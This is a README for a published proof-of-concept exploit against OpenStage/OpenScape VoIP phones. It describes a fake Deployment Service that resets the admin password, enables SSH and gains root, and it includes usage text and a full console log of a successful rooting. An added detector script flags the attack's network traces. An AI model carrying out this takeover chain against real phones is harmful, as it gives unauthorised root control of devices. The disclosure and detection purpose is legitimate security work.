This Python script is a proof of concept that demonstrates a fake Deployment Service (DLS) in the OpenStage/OpenScape world, pushing configuration into unhardened OpenStage and OpenScape phones. In the default configuration, the phone accepts any Deployment Service. The exploitation process is:
- The script connects to a phone and triggers a connection to the fake Deployment Service.
- The fake Deployment Service resets the admin password and enables SSH access.
- The script logs in as admin via SSH.
- The script elevates privileges to root.
- The script enables root login via SSH by restarting the Dropbear service without the root login restriction.
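The chain above leaves three network-visible traces: an unexpected peer talking to the phone's DLS interface port, the phone logging in to a Deployment Service that is not the legitimate one, and an SSH session to the phone. The following detector is an added example (not part of the Pentagrid PoC) that flags these traces in constructed connection-log lines; the log format, the phone address and the address of the legitimate DLS are assumptions.

```python
from dataclasses import dataclass
from typing import Iterable, List, Set

# Constructed sample log, one connection per line:
# "timestamp src_ip dst_ip dst_port http_path" ("-" means no HTTP path seen).
SAMPLE_LOG = """\
2024-01-01T10:00:00 192.168.23.10 192.168.23.5 8085 -
2024-01-01T10:00:05 192.168.23.42 192.168.23.5 8085 -
2024-01-01T10:00:06 192.168.23.5 192.168.23.42 9999 /DeploymentService/LoginService
2024-01-01T10:00:20 192.168.23.42 192.168.23.5 22 -
2024-01-01T10:01:00 192.168.23.5 192.168.23.10 18443 /DeploymentService/LoginService
"""

DLS_PORT = 8085  # phone-side DLS interface port named in the PoC output
DLS_LOGIN_PATH = "/DeploymentService/LoginService"  # path the phone POSTs to when contacted

@dataclass(frozen=True)
class Finding:
    ts: str
    phone: str
    reason: str

def parse_line(line: str):
    ts, src, dst, dport, path = line.split()
    return ts, src, dst, int(dport), (None if path == "-" else path)

def detect(lines: Iterable[str], phones: Set[str], legit_dls: Set[str]) -> List[Finding]:
    """Flag the three observable stages of the fake-DLS chain for the given phones."""
    findings: List[Finding] = []
    for raw in lines:
        if not raw.strip():
            continue
        ts, src, dst, dport, path = parse_line(raw)
        # Stage 1: a host other than the real DLS talks to the phone's DLS interface port.
        if dst in phones and dport == DLS_PORT and src not in legit_dls:
            findings.append(Finding(ts, dst, f"DLS port contacted by non-DLS host {src}"))
        # Stage 2: the phone logs in to a Deployment Service that is not on the allowlist.
        if src in phones and path == DLS_LOGIN_PATH and dst not in legit_dls:
            findings.append(Finding(ts, src, f"phone logged in to unknown DLS {dst}"))
        # Stage 3: the DLS step turns SSH on, so a new SSH session to a phone is worth review.
        if dst in phones and dport == 22:
            findings.append(Finding(ts, dst, f"SSH session to phone from {src}"))
    return findings

def run_sample() -> List[Finding]:
    # Assumed addresses: 192.168.23.5 is a phone, 192.168.23.10 the legitimate DLS.
    return detect(SAMPLE_LOG.splitlines(), phones={"192.168.23.5"}, legit_dls={"192.168.23.10"})

if __name__ == "__main__":
    for f in run_sample():
        print(f.ts, f.phone, f.reason)
```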
The details are explained in our blog post "Remote code execution and elevation of local privileges in Mitel Unify OpenStage and OpenScape VoIP phones".
- Create certificates:
  ./make_certs.sh
- Install dependencies via your OS (or use a VENV):
  apt install python3-paramiko python3-twisted
Overview of options:
$ ./openstage-fakedls-server.py --help
usage: openstage-exploit [-h] --own-ip IPADDR [--own-port PORT] --target-ip IPADDR

Proof of concept exploit for OpenScape/OpenStage VoIP phones.

options:
  -h, --help          show this help message and exit
  --own-ip IPADDR     IP address of fake DLS server.
  --own-port PORT     Port number of fake DLS server. (default: 9999)
  --target-ip IPADDR  IP address of target phone.

The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.
Example run:
$ ./openstage-fakedls-server.py --own-ip 192.168.23.42 --target-ip 192.168.23.5
The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.
+ Set up fake DLS server at port 9999
+ Attacking target 192.168.23.5 using 192.168.23.42:9999 as fake DLS server.
+ Test if DLS interface TCP port at 192.168.23.5:8085 is open.
+ Send 'Contact me' to target 192.168.23.5:8085.
+ Sending 'Contact me' to target 192.168.23.5:8085 was successful.
+ Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService.
+ Check if SSH port 192.168.23.5:22 is available.
+ Failed to establish SSH connection to root@192.168.23.5: Authentication failed.
+ Phone 192.168.23.5 has SSH enabled, but is not rooted, yet. Trying to root it.
+ SSH connected to admin@192.168.23.5 with password "123456".
+ Trying to root a target of type OpenScape Desk Phone CP710.
+ Phone 192.168.23.5 was prepared for rooting.
+ Test if DLS interface TCP port at 192.168.23.5:8085 is open.
+ Send 'Contact me' to target 192.168.23.5:8085.
+ Sending 'Contact me' to target 192.168.23.5:8085 was successful.
+ Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService.
+ Check if SSH port 192.168.23.5:22 is available.
+ Phone 192.168.23.5: Reenable SSH and change password again.
+ Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService.
+ Check if SSH port 192.168.23.5:22 is available.
+ SSH connected to root@192.168.23.5 with password "123456".
+ Test if DLS interface TCP port at 192.168.23.5:8085 is open.
+ Send 'Contact me' to target 192.168.23.5:8085.
+ Sending 'Contact me' to target 192.168.23.5:8085 was successful.
+ Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService.
+ Check if SSH port 192.168.23.5:22 is available.
+ Phone 192.168.23.5 is already/now rooted. There is nothing really to do.
The proof of concept is published by Pentagrid AG under a BSD licence with a non-military clause. Please read LICENSE.txt for further details.
The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.